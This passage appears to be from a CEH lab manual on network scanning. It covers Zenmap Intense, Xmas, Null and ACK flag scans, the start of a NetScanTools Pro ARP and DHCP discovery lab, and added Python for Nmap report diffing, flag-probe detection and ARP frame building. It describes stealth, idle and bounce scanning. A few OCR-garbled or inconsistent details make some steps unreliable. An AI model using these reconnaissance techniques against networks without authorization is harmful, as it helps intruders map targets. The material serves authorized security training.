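    hosts: Dict[str, HostPorts] = {}
    for host in ET.fromstring(xml_text).findall("host"):
        ip = next((a.get("addr") for a in host.findall("address")
                   if a.get("addrtype") in ("ipv4", "ipv6")), None)
        if ip is None:
            continue
        ports: HostPorts = {}
        for port in host.findall("./ports/port"):
            key = (port.get("protocol"), int(port.get("portid")))
            state = port.find("state").get("state")
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            product = (" ".join(v for v in (svc.get("product"), svc.get("version")) if v)
                       if svc is not None else "")
            ports[key] = (state, name, product)
        hosts[ip] = ports
    return hosts


def open_ports(report: Dict[str, HostPorts], ip: str) -> List[PortKey]:
    """Sorted (protocol, port) keys that the report records as open for ip."""
    return sorted(k for k, v in report.get(ip, {}).items() if v[0] == "open")


def diff_open_ports(baseline: Dict[str, HostPorts],
                    current: Dict[str, HostPorts]) -> Dict[str, Dict[str, List[PortKey]]]:
    """Ports newly open or no longer open per host; an empty dict means no change.
    A port absent from the XML is treated as not open (Nmap folds closed ports
    into <extraports>), so 'closed' here means 'was open, now is not'."""
    changes: Dict[str, Dict[str, List[PortKey]]] = {}
    for ip in sorted(set(baseline) | set(current)):
        before, after = set(open_ports(baseline, ip)), set(open_ports(current, ip))
        opened, closed = sorted(after - before), sorted(before - after)
        if opened or closed:
            changes[ip] = {"opened": opened, "closed": closed}
    return changes


if __name__ == "__main__":
    base, cur = parse_nmap_xml(BASELINE_XML), parse_nmap_xml(CURRENT_XML)
    for (proto, num), (state, name, product) in sorted(base["10.0.0.4"].items()):
        print(f"{num}/{proto:<4} {state:<6} {name:<14} {product}")
    print(diff_open_ports(base, cur))
```

Run the same comparison against each saved report in turn and the "opened" list is exactly the set of suspicious ports the objective asks for; a port that appears without a corresponding change ticket is what should be investigated.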


12. Click the Topology tab to view Nmap's topology for the provided IP address in the Intense scan Profile.

By default, Nmap performs a host discovery and then a port scan against each host it determines to be online.

FIGURE 6.8: The Zenmap main window with the Topology tab for Intense Scan

13. Click the Host Details tab to see the details of all hosts discovered during the intense scan profile.

[Screenshot: Zenmap Host Details tab for 10.0.0.4:]

Host Status: State: up; Open ports: 9; Filtered ports: 0; Closed ports: 991; Scanned ports: 1000; Uptime: 22151; Last boot: Fri Aug 24 09:27:40 2012
Addresses: IPv4: 10.0.0.4; IPv6: Not available; MAC: 00:15:5D:00:07:10
Operating System: Name: Microsoft Windows 7 or Windows Server 2008 SP1
Ports used

By default, Nmap determines your DNS servers (for rDNS resolution) from your resolv.conf file (UNIX) or the Registry (Win32).

FIGURE 6.9: The Zenmap main window with the Host Details tab for Intense Scan


14. Click the Scans tab to see the scan details for the provided IP addresses.

[Screenshot: Zenmap Scans tab listing the unsaved scan "nmap -T4 -A -v 10.0.0.4" with its status, and the Append Scan, Remove Scan and Cancel Scan buttons.]

Nmap offers options for specifying which ports are scanned and whether the scan order is randomized or sequential.

In Nmap, option -p <port ranges> means scan only the specified ports.

FIGURE 6.10: The Zenmap main window with the Scans tab for Intense Scan

15. Now, click the Services tab located in the right pane of the window. This tab displays the list of services.

16. Click the http service to list all the HTTP hostnames/IP addresses, ports, and their states (Open/Closed).
[Screenshot: Zenmap Services pane with http selected; the row shows Hostname 10.0.0.4, Port 5357, Protocol tcp, State open, Version Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP). The other services listed are msrpc and netbios-ssn.]

In Nmap, option -F means fast (limited port) scan.

FIGURE 6.11: The Zenmap main window with the Services option for Intense Scan

17. Click the
Scan Target: I o o ls

m srp c

service to list all the Microsoft Windows RPC.
In Nmap, option --port-ratio <ratio> (a decimal number between 0 and 1) scans all ports in the nmap-services file with a ratio greater than the one given. <ratio> must be between 0.0 and 1.1.

FIGURE 6.12: The Zenmap main window with the msrpc service for Intense Scan

18. Click the netbios-ssn service to list all NetBIOS hostnames.
In Nmap, option -r means don't randomize ports.

FIGURE 6.13: The Zenmap main window with the netbios-ssn service for Intense Scan
TASK 2
Xmas Scan

19. Xmas scan sends a TCP frame to a remote device with the URG, ACK, RST, SYN, and FIN flags set. FIN scans work only against operating systems whose TCP/IP stack is implemented according to RFC 793. The current version of Microsoft Windows is not supported.

20. Now, to perform an Xmas Scan, you need to create a new profile. Click Profile -> New Profile or Command (Ctrl+P).

Xmas scan (-sX) sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

The option --max-retries <numtries> specifies the maximum number of port scan probe retransmissions.

21. On the Profile tab, enter Xmas Scan in the Profile name text field.

The option --host-timeout <time> gives up on slow target hosts.

FIGURE 6.15: The Zenmap Profile Editor window with the Profile tab


22. Click the Scan tab, and select Xmas Tree scan (-sX) from the TCP scan: drop-down list.

UDP scan is activated with the -sU option. It can be combined with a TCP scan type such as SYN scan (-sS) to check both protocols during the same run.

Nmap detects rate limiting and slows down accordingly to avoid flooding the network with useless packets that the target machine drops.

FIGURE 6.16: The Zenmap Profile Editor window with the Scan tab

23. Select None in the Non-TCP scans: drop-down list and Aggressive (-T4) in the Timing template: list, and click Save Changes.

You can speed up your UDP scans by scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using --host-timeout to skip slow hosts.

FIGURE 6.17: The Zenmap Profile Editor window with the Scan tab

24. Enter the IP address in the Target: field, select the Xmas scan option from the Profile: field, and click Scan.


In Nmap, option -sY (SCTP INIT scan) is often referred to as half-open scanning, because you don't open a full SCTP association. You send an INIT chunk, as if you were going to open a real association, and then wait for a response.

FIGURE 6.18: The Zenmap main window with Target and Profile entered

25. Nmap scans the target IP address provided and displays results on the Nmap Output tab.

When scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits results in a returned RST if the port is closed, and no response at all if the port is open.

The option -sA (TCP ACK scan) is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.

Nmap output of the Xmas scan (as shown in the figure):

    nmap -sX -T4 -A -v 10.0.0.4
    Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
    NSE: Loaded 93 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating ARP Ping Scan at 16:29
    Scanning 10.0.0.4 [1 port]
    Completed ARP Ping Scan at 16:29, 0.15s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 16:29
    Completed Parallel DNS resolution of 1 host. at 16:29, 0.00s elapsed
    Initiating XMAS Scan at 16:29
    Scanning 10.0.0.4 [1000 ports]
    Increasing send delay for 10.0.0.4 from 0 to 5 due to 34 out of 84 dropped probes since last increase.
    Completed XMAS Scan at 16:30, 8.36s elapsed (1000 total ports)
    Initiating Service scan at 16:30
    Initiating OS detection (try #1) against 10.0.0.4
    NSE: Script scanning 10.0.0.4.
    Initiating NSE at 16:30
    Completed NSE at 16:30, 0.00s elapsed
    Nmap scan report for 10.0.0.4
    Host is up (0.00020s latency).

FIGURE 6.19: The Zenmap main window with the Nmap Output tab

26. Click the Services tab located at the right side of the pane. It displays all the services of that host.


FIGURE 6.20: The Zenmap main window with the Services tab
TASK 3
Null Scan

27. Null scan works only if the operating system's TCP/IP implementation is developed according to RFC 793. In a null scan, attackers send a TCP frame to a remote host with no flags set.

The option Null Scan (-sN) does not set any bits (the TCP flag header is 0).

28. To perform a null scan for a target IP address, create a new profile. Click Profile -> New Profile or Command (Ctrl+P).
The option -sZ (SCTP COOKIE ECHO scan) is an advanced SCTP COOKIE ECHO scan. It takes advantage of the fact that SCTP implementations should silently drop packets containing COOKIE ECHO chunks on open ports but send an ABORT if the port is closed.

FIGURE 6.21: The Zenmap main window with the New Profile or Command option


29. On the Profile tab, input the profile name Null Scan in the Profile name text field.

The option -sI <zombie host>[:<probeport>] (idle scan) is an advanced scan method that allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable IP fragmentation ID sequence generation on the zombie host to glean information about the open ports on the target.

FIGURE 6.22: The Zenmap Profile Editor with the Profile tab

The option -b <FTP relay host> (FTP bounce scan) allows a user to connect to one FTP server, and then ask that files be sent to a third-party server. Such a feature is ripe for abuse on many levels, so most servers have ceased supporting it.

30. Click the Scan tab in the Profile Editor window. Now select the Null scan (-sN) option from the TCP scan: drop-down list.

The option -r (Don't randomize ports): By default, Nmap randomizes the scanned port order (except that certain commonly accessible ports are moved near the beginning for efficiency reasons). This randomization is normally desirable, but you can specify -r for sequential (sorted from lowest to highest) port scanning instead.

FIGURE 6.23: The Zenmap Profile Editor with the Scan tab

31. Select None from the Non-TCP scans: drop-down field and select Aggressive (-T4) from the Timing template: drop-down field.

32. Click Save Changes to save the newly created profile.


In Nmap, option --version-all (Try every single probe) is an alias for --version-intensity 9, ensuring that every single probe is attempted against each port.

The option --top-ports <n> scans the <n> highest-ratio ports found in the nmap-services file. <n> must be 1 or greater.

FIGURE 6.24: The Zenmap Profile Editor with the Scan tab

33. In the main window of Zenmap, enter the target IP address to scan, select the Null Scan profile from the Profile drop-down list, and then click Scan.
The option -sR (RPC scan) works in conjunction with the various port scan methods of Nmap. It takes all the TCP/UDP ports found open and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up.

FIGURE 6.25: The Zenmap main window with Target and Profile entered

34. Nmap scans the target IP address provided and displays results in the Nmap Output tab.


The option --version-trace (Trace version scan activity) causes Nmap to print out extensive debugging info about what version scanning is doing. It is a subset of what you get with --packet-trace.

Nmap output of the Null scan (as shown in the figure):

    nmap -sN -T4 -A -v 10.0.0.4
    Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
    NSE: Loaded 93 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating ARP Ping Scan at 16:47
    Scanning 10.0.0.4 [1 port]
    Completed ARP Ping Scan at 16:47, 0.14s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 16:47
    Completed Parallel DNS resolution of 1 host. at 16:47, 0.28s elapsed
    Initiating NULL Scan at 16:47
    Scanning 10.0.0.4 [1000 ports]
    Increasing send delay for 10.0.0.4 from 0 to 5 due to 68 out of 169 dropped probes since last increase.
    Completed NULL Scan at 16:47, 7.78s elapsed (1000 total ports)
    Initiating Service scan at 16:47
    Initiating OS detection (try #1) against 10.0.0.4
    NSE: Script scanning 10.0.0.4.
    Initiating NSE at 16:47
    Completed NSE at 16:47, 0.00s elapsed
    Nmap scan report for 10.0.0.4
    Host is up (0.000068s latency).

FIGURE 6.26: The Zenmap main window with the Nmap Output tab

35. Click the Host Details tab to view the details of hosts, such as Status, Addresses, Open Ports, and Closed Ports.
Host Details for 10.0.0.4 (as shown in the figure): State up; Open ports 0; Filtered ports 0; Closed ports 1000; Scanned ports 1000; Up time and Last boot not available; IPv4 10.0.0.4; IPv6 not available; MAC 00:15:5D:00:07:10.

FIGURE 6.27: The Zenmap main window with the Host Details tab
TASK 4
ACK Flag Scan

36. Attackers send an ACK probe packet with a random sequence number. No response means the port is filtered, and an RST response means the port is not filtered.

37. To perform an ACK Flag Scan for a target IP address, create a new profile. Click Profile -> New Profile or Command (Ctrl+P).

The option --script-updatedb updates the script database found in scripts/script.db, which is used by Nmap to determine the available default scripts and categories. It is necessary to update the database only if you have added or removed NSE scripts from the default scripts directory or if you have changed the categories of any script. This option is generally used by itself: nmap --script-updatedb.

FIGURE 6.28: The Zenmap main window with the New Profile or Command option

38. On the Profile tab, input ACK Flag Scan in the Profile name text field.

The options --min-parallelism <numprobes>; --max-parallelism <numprobes> (Adjust probe parallelization) control the total number of probes that may be outstanding for a host group. They are used for port scanning and host discovery. By default, Nmap calculates an ever-changing ideal parallelism based on network performance.

FIGURE 6.29: The Zenmap Profile Editor window with the Profile tab

39. To select the parameters for an ACK scan, click the Scan tab in the Profile Editor window, select ACK scan (-sA) from the Non-TCP scans: drop-down list, and select None for all the other fields but leave the Targets: field empty.


The options --min-rtt-timeout <time>, --max-rtt-timeout <time>, --initial-rtt-timeout <time> (Adjust probe timeouts): Nmap maintains a running timeout value for determining how long it waits for a probe response before giving up or retransmitting the probe. This is calculated based on the response times of previous probes.

FIGURE 6.30: The Zenmap Profile Editor window with the Scan tab

40. Now click the Ping tab and check IPProto probes (-PO) to probe the IP address, and then click Save Changes.

The option --max-retries <numtries> (Specify the maximum number of port scan probe retransmissions): When Nmap receives no response to a port scan probe, it can mean the port is filtered. Or maybe the probe or response was simply lost on the network.

FIGURE 6.31: The Zenmap Profile Editor window with the Ping tab

41. In the Zenmap main window, input the IP address of the target machine (in this lab: 10.0.0.3), select ACK Flag Scan from the Profile: drop-down list, and then click Scan.


The option --host-timeout <time> (Give up on slow target hosts): Some hosts simply take a long time to scan. This may be due to poorly performing or unreliable networking hardware or software, packet rate limiting, or a restrictive firewall. The slowest few percent of the scanned hosts can eat up a majority of the scan time.

FIGURE 6.32: The Zenmap main window with the Target and Profile entered

42. Nmap scans the target IP address provided and displays results on the Nmap Output tab.

The options --scan-delay <time>; --max-scan-delay <time> (Adjust delay between probes): This option causes Nmap to wait at least the given amount of time between each probe it sends to a given host. This is particularly useful in the case of rate limiting.

Nmap output of the ACK scan (as shown in the figure):

    nmap -sA -PO 10.0.0.4
    Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 17:03 India Standard Time
    Nmap scan report for 10.0.0.4
    Host is up (0.0000030s latency).
    All 1000 scanned ports on 10.0.0.4 are unfiltered
    MAC Address: 00:15:5D:00:07:10 (Microsoft)
    Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds

FIGURE 6.33: The Zenmap main window with the Nmap Output tab

43. To view more details regarding the hosts, click the Host Details tab.


The options --min-rate <number>; --max-rate <number> (Directly control the scanning rate): Nmap's dynamic timing does a good job of finding an appropriate speed at which to scan. Sometimes, however, you may happen to know an appropriate scanning rate for a network, or you may have to guarantee that a scan finishes by a certain time.

Host Details for 10.0.0.4 (as shown in the figure): State up; Scanned ports 1000; Up time and Last boot not available; IPv4 10.0.0.4; IPv6 not available; MAC 00:15:5D:00:07:10.

FIGURE 6.34: The Zenmap main window with the Host Details tab
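The response rules that Tasks 2 to 4 rely on (RST for a closed port and silence for an open one on an RFC 793 stack, RST regardless of port state on Windows, and RST meaning "unfiltered" for an ACK probe) can be written down and checked in code. The following Python is an added example, not part of the lab manual or of Nmap: it parses a bare TCP header, labels the probe with the scan type used in this lab, predicts the target's reply, and summarises a constructed batch of probe headers the way a simple scan detector would; the header bytes, source ports and destination ports are made up.

```python
import struct
from collections import defaultdict

# RFC 793 TCP control bits, carried in the low 6 bits of header octets 12-13.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_NAMES = ((URG, "URG"), (ACK, "ACK"), (PSH, "PSH"),
              (RST, "RST"), (SYN, "SYN"), (FIN, "FIN"))

# Probe signatures of the Zenmap profiles built in this lab.
SCAN_TYPES = {
    0: "null",                # -sN: no flags at all
    FIN | PSH | URG: "xmas",  # -sX: FIN, PSH and URG set
    FIN: "fin",               # -sF
    ACK: "ack",               # -sA
    SYN: "syn",               # -sS (half-open)
}


def flag_names(flags):
    """Human-readable flag list, e.g. 0x29 -> 'URG,PSH,FIN'."""
    names = [name for bit, name in FLAG_NAMES if flags & bit]
    return ",".join(names) if names else "none"


def parse_tcp_header(raw):
    """Parse a bare 20-byte TCP header (no IP header) into (sport, dport, flags)."""
    if len(raw) < 20:
        raise ValueError("TCP header is at least 20 bytes")
    sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", raw[:14])
    return sport, dport, off_flags & 0x3F


def classify_probe(flags):
    """Map a flag combination to the scan type it signals ('other' if none)."""
    return SCAN_TYPES.get(flags, "other")


def expected_response(flags, port_state, rfc793=True):
    """Reply a target sends to a probe, following the rules stated in the lab.

    port_state is 'open', 'closed' or 'filtered'.  rfc793=False models a
    stack (such as Windows, which the lab says is not supported) that answers
    Xmas/Null/FIN probes with RST whether the port is open or closed.
    """
    if port_state == "filtered":
        return "none"  # a filtering device drops the probe silently
    if flags & SYN and not flags & ACK:  # SYN probe (session establishment)
        return "SYN/ACK" if port_state == "open" else "RST"
    if flags & ACK:  # ACK probe: RST either way, it only shows 'unfiltered'
        return "RST"
    if not flags & RST:  # inverse TCP flag probes: Xmas, Null, FIN
        if not rfc793:
            return "RST"
        return "none" if port_state == "open" else "RST"
    return "none"


def interpret(scan_type, response):
    """What the scanner concludes from a reply, as stated in the lab text."""
    if scan_type == "ack":
        return "unfiltered" if response == "RST" else "filtered"
    if scan_type == "syn":
        return {"SYN/ACK": "open", "RST": "closed"}.get(response, "filtered")
    if scan_type in ("xmas", "null", "fin"):
        return "closed" if response == "RST" else "open|filtered"
    return "unknown"


def summarize_probes(headers):
    """Group probes by scan type and destination port, the view a detector
    wants when a burst of Null or Xmas packets hits many ports."""
    seen = defaultdict(set)
    for raw in headers:
        _sport, dport, flags = parse_tcp_header(raw)
        seen[classify_probe(flags)].add(dport)
    return {kind: sorted(ports) for kind, ports in seen.items()}


def make_header(sport, dport, flags):
    """Build a 20-byte TCP header (data offset 5, window 1024) for the sample."""
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags,
                       1024, 0, 0)


# Constructed sample (not captured traffic): Xmas probes to ports 135, 139 and
# 445, Null probes to 135 and 445, and one ACK probe to 135.
SAMPLE = [make_header(40000, p, FIN | PSH | URG) for p in (135, 139, 445)]
SAMPLE += [make_header(40001, p, 0) for p in (135, 445)]
SAMPLE += [make_header(40002, 135, ACK)]

if __name__ == "__main__":
    print(summarize_probes(SAMPLE))
    for kind, flags in (("xmas", FIN | PSH | URG), ("null", 0), ("ack", ACK)):
        for state in ("open", "closed", "filtered"):
            reply = expected_response(flags, state)
            print(kind, state, "->", reply, "=>", interpret(kind, reply))
```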

Lab Analysis

Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.

Tool/Utility: Nmap

Information Collected/Objectives Achieved:

Types of Scan used:
■ Intense scan
■ Xmas scan
■ Null scan
■ ACK Flag scan

Intense Scan - Nmap Output:
■ ARP Ping Scan - 1 host
■ Parallel DNS resolution of 1 host
■ SYN Stealth Scan
■ Discovered open ports on 10.0.0.4: 135/tcp, 139/tcp, 445/tcp, ...
■ MAC Address
■ Operating System Details
■ Uptime Guess
■ Network Distance
■ TCP Sequence Prediction
■ IP ID Sequence Generation
■ Service Info


YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Analyze and evaluate the results by scanning a target network using:
a. Stealth Scan (Half-open Scan)
b. nmap -P

2. Perform Inverse TCP Flag Scanning and analyze hosts and services for a target machine in the network.

Internet Connection Required
☐ Yes ☑ No

Platform Supported
☑ Classroom ☑ iLabs


Scanning a Network Using NetScan Tools Pro

NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for network professionals.

ICON KEY: Valuable information; Test your knowledge; Web exercise; Workbook review

Lab Scenario

You have already noticed in the previous lab how you can gather information such as ARP ping scan, MAC address, operating system details, IP ID sequence generation, service info, etc. through Intense Scan, Xmas Scan, Null Scan and ACK Flag Scan in Nmap. An attacker can simply scan a target without sending a single packet to the target from their own IP address; instead, they use a zombie host to perform the scan remotely, and if an intrusion detection report is generated, it will display the IP of the zombie host as the attacker. Attackers can easily know how many packets have been sent since the last probe by checking the IP packet fragment identification number (IPID). As an expert penetration tester, you should be able to determine whether a TCP port is open by sending a SYN (session establishment) packet to the port. The target machine will respond with a SYN ACK (session request acknowledgement) packet if the port is open and RST (reset) if the port is closed, and you should be prepared to block any such attacks on the network. In this lab you will learn to scan a network using NetScan Tools Pro. You also need to discover the network and gather information about Internet or local LAN network devices, IP addresses, domains, device ports, and many other network specifics.

Lab Objectives

The objective of this lab is to assist in troubleshooting, diagnosing, monitoring, and discovering devices on the network.

In this lab, you need to:
■ Discover IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs
■ Detect local ports


Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Environment

To perform the lab, you need:
■ NetScan Tools Pro located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\NetScanTools Pro
■ You can also download the latest version of NetScan Tools Pro from the link http://www.netscantools.com/nstpromain.html
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Administrative privileges to run the NetScan Tools Pro tool

Lab Duration

Time: 10 Minutes

Overview of Network Scanning

Network scanning is the process of examining the activity on a network, which can include monitoring data flow as well as monitoring the functioning of network devices. Network scanning serves to promote both the security and performance of a network. Network scanning may also be employed from outside a network in order to identify potential network vulnerabilities. NetScanTools Pro performs the following network scanning functions:
■ Monitoring network device availability
■ Notifying IP addresses, hostnames, domain names, and port scanning

Lab Tasks

Install NetScanTools Pro on your Windows Server 2012. Follow the wizard-driven installation steps and install NetScanTools Pro.

TASK 1
Scanning the Network

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

Active Discovery and Diagnostic Tools are tools that you can use to locate and test devices connected to your network. Active discovery means that we send packets to the devices in order to obtain responses.

FIGURE 7.1: Windows Server 2012 - Desktop view

2. Click the NetScanTools Pro app to open the NetScanTools Pro window


FIGURE 7.2: Windows Server 2012 - Apps

3. If you are using the Demo version of NetScanTools Pro, then click Start the DEMO

4. The Open or Create a New Results Database - NetScanTools Pro window will appear; enter a new database name in Database Name (enter new name here)

Note: The database is created in the Results Database Directory; its file name is prefixed with NstProData- and has the extension .db3. No spaces or periods are allowed in a new database name.

5. Set a default directory for the results database file location and click Continue
Open or Create a New Results Database - NetScanTools Pro dialog: "NetScanTools Pro automatically saves results in a database. The database is required. Create a new Results Database, open a previous Results Database, or use this software in Training Mode with a temporary Results Database." The dialog also takes an optional Project Name and optional Analyst Information (name, title, organization, telephone, mobile number, email address) that can be displayed in reports, plus buttons for Select Another Results Database, Create Training Mode Database, Use Last Results Database, Continue, and Exit Program.

Note: USB version: start the software by locating nstpro.exe on your USB drive; it is normally in the /nstpro directory.
FIGURE 7.3: Setting a new database name for NetScanTools Pro

6. The NetScanTools Pro main window will appear as shown in the following figure


NetScanTools Pro Demo Version main window (Build 8-17-12, based on version 11.19): the welcome pane explains that the tools are grouped by function on the left panel (Automated Tools, Manual Tools (all), Favorite Tools, Active Discovery Tools, Passive Discovery Tools, DNS Tools, Packet Level Tools, External Tools, Program Info); red icon tools contact the target, green icon tools listen to network traffic, blue icon tools operate on the local system, and gray icon tools contact third-party web sites. Press F1 for local help, including the Getting Started information.

Note: IP version 6 addresses have a different format from IPv4 addresses and they can be much longer or far shorter. IPv6 addresses always contain two or more colon characters and never contain periods. Example: 2001:4860:b006::69 (ipv6.google.com) or ::1 (the internal loopback address).
FIGURE 7.4: Main window of NetScanTools Pro

7. Select Manual Tools (all) on the left panel and click ARP Ping. A window will appear with information about the ARP Ping tool.

8. Click OK
About the ARP Ping Tool (as shown by NetScanTools Pro): Use this tool to ping an IPv4 address on your subnet using ARP packets. Use it on your LAN to find the response time of a device to an ARP_REQUEST packet even if the device is hidden and does not respond to regular ping. ARP Ping requires a target IPv4 address on your LAN. Special feature: identify duplicate IPv4 addresses by pinging a specific IPv4 address; if more than one device (two or more MAC addresses) responds, you are shown the address of each of the devices. Right-click in the results for a menu with more options. Demo limitations: none.

Note: ARP Ping is a useful tool capable of sending ARP packets to a target IP address, and it can also search for multiple devices sharing the same IP address on your LAN.

FIGURE 7.5: Selecting the manual tools option

9. Select the Send Broadcast ARP, then Unicast ARP radio button, enter the IP address in Target IPv4 Address, and click Send Arp


Note: Send Broadcast ARP, and then Unicast ARP: this mode first sends an ARP packet to the IPv4 address using the broadcast ARP MAC address. Once it receives a response, it sends subsequent packets to the responding MAC address. The source IP address is your interface IP as defined in the Local IP selection box. The other modes are Send Broadcast only and Search for Duplicate IP Addresses.

ARP Ping results window (Target IPv4 Address 10.0.0.1, Number to Send 16, WinPcap interface selected): the first probe is listed as Broadcast and the following ones as Unicast, each row showing the index, target IP, responding MAC address, and response time in milliseconds.

FIGURE 7.6: Result of ARP Ping

10. Click ARP Scan (MAC Scan) in the left panel. A window will appear with information about the ARP Scan tool. Click OK
About the ARP Scan Tool (as shown by NetScanTools Pro): Use this tool to send an ARP Request to every IPv4 address on your LAN. IPv4-connected devices cannot hide from ARP packets and must respond with their IP and MAC addresses. Uncheck the Resolve IPs box for faster scan completion time. Right-click in the results for a menu with more options. Demo limitations: none.

Note: ARP Scan (sometimes called a MAC Scan) sends ARP packets to the range of IPv4 addresses specified by the Start and End IP Address entry boxes. The purpose of this tool is to rapidly sweep your subnet for IPv4-connected devices. Because ARP is not forwarded by routers, the sweep only covers the scanner's own broadcast domain.

FIGURE 7.7: Selecting the ARP Scan (MAC Scan) option

11. Enter the range of IPv4 addresses in the Starting IPv4 Address and Ending IPv4 Address text boxes

12. Click Do Arp Scan
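The ARP Ping and ARP Scan steps above come down to one frame format. The following is an added example, not NetScanTools code and not from the lab manual: it builds the broadcast ARP request a scan sends for every address in a subnet, parses the replies, and reports any IPv4 address that more than one MAC claimed, which is the duplicate-address feature the tool describes. The MAC and IP values are constructed for illustration; the only function that touches the wire, linux_send_and_listen, assumes Linux AF_PACKET sockets and raw-socket privilege, everything else is pure frame arithmetic and runs anywhere.

```python
"""ARP request/reply encoder, reply parser, subnet sweep and duplicate-IP detection."""
import ipaddress
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ARP_REQUEST, ARP_REPLY = 1, 2
# 28-byte ARP body (RFC 826) that follows the 14-byte Ethernet II header.
ARP_FMT = "!HHBBH6s4s6s4s"


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(sender_mac, sender_ip, target_ip, oper=ARP_REQUEST,
              target_mac=None, dst_mac=BROADCAST_MAC):
    """Ethernet frame carrying an ARP request (default) or reply.

    A request goes to the broadcast MAC with an all-zero target MAC; the tool's
    "Unicast ARP" mode is the same frame with dst_mac set to whoever answered.
    """
    tha = mac_bytes(target_mac) if target_mac else b"\x00" * 6
    eth = mac_bytes(dst_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, oper,
                      mac_bytes(sender_mac), ipaddress.IPv4Address(sender_ip).packed,
                      tha, ipaddress.IPv4Address(target_ip).packed)
    return eth + arp


def parse_arp(frame):
    """Decode the ARP fields of a frame; None if it is not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"oper": oper,
            "sender_mac": mac_str(sha), "sender_ip": str(ipaddress.IPv4Address(spa)),
            "target_mac": mac_str(tha), "target_ip": str(ipaddress.IPv4Address(tpa))}


def arp_sweep_frames(sender_mac, sender_ip, cidr):
    """One broadcast request per host address: the frames an ARP Scan transmits."""
    net = ipaddress.IPv4Network(cidr, strict=False)
    return [build_arp(sender_mac, sender_ip, str(host)) for host in net.hosts()]


def collect_replies(frames):
    """Map each IP that answered to the set of MACs that claimed it."""
    seen = defaultdict(set)
    for frame in frames:
        arp = parse_arp(frame)
        if arp and arp["oper"] == ARP_REPLY:
            seen[arp["sender_ip"]].add(arp["sender_mac"])
    return dict(seen)


def duplicate_ips(replies):
    """IPs claimed by more than one MAC: a misconfigured host or an ARP spoofer."""
    return {ip: macs for ip, macs in replies.items() if len(macs) > 1}


def linux_send_and_listen(interface, frames, timeout=2.0):
    """Transmit frames and gather answers on Linux (needs CAP_NET_RAW or root).

    AF_PACKET is Linux-only; this is the one function that will not run elsewhere.
    """
    import socket
    import time
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    sock.bind((interface, 0))
    sock.settimeout(0.2)
    for frame in frames:
        sock.send(frame)
    answers, deadline = [], time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            answers.append(sock.recv(2048))
        except socket.timeout:
            continue
    sock.close()
    return collect_replies(answers)
```

A host that answers ARP but drops ICMP is exactly the "hidden" device the tool's description mentions, which is why an ARP sweep of the local subnet is more complete than a ping sweep; the price is that it cannot reach past the first router.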


ARP Scan (MAC Scan) results window (Starting IPv4 Address 10.0.0.1, Ending IPv4 Address 10.0.0.7, scanning from 10.0.0.7 on the WinPcap interface, Resolve IPs checked): each responding host is listed with its IPv4 address, MAC address, I/F manufacturer, hostname, entry type (dynamic), and whether it is the local address.

Note: The Connection Detection tool listens for incoming connections on TCP or UDP ports. It can also listen for ICMP packets. The sources of the incoming connections are shown in the results list and are logged to a SQLite database.
FIGURE 7.8: Result of ARP Scan (MAC Scan)

13. Click DHCP Server Discovery in the left panel. A window will appear with information about the DHCP Server Discovery tool. Click OK
About the DHCP Server Discovery Tool (as shown by NetScanTools Pro): Use this tool to quickly locate DHCP servers (IPv4 only) on your local network. It shows the IP address and other settings that are being handed out by DHCP servers. This tool can also find unknown or 'rogue' DHCP servers. Right-click in the results for a menu with more options. Demo limitations: none.

Note: DHCP is a method of dynamically assigning IP addresses and other network parameter information to network clients from DHCP servers.

FIGURE 7.9: Selecting the DHCP Server Discovery tool option

14. Select all the Discover Options check boxes and click Discover DHCP Servers
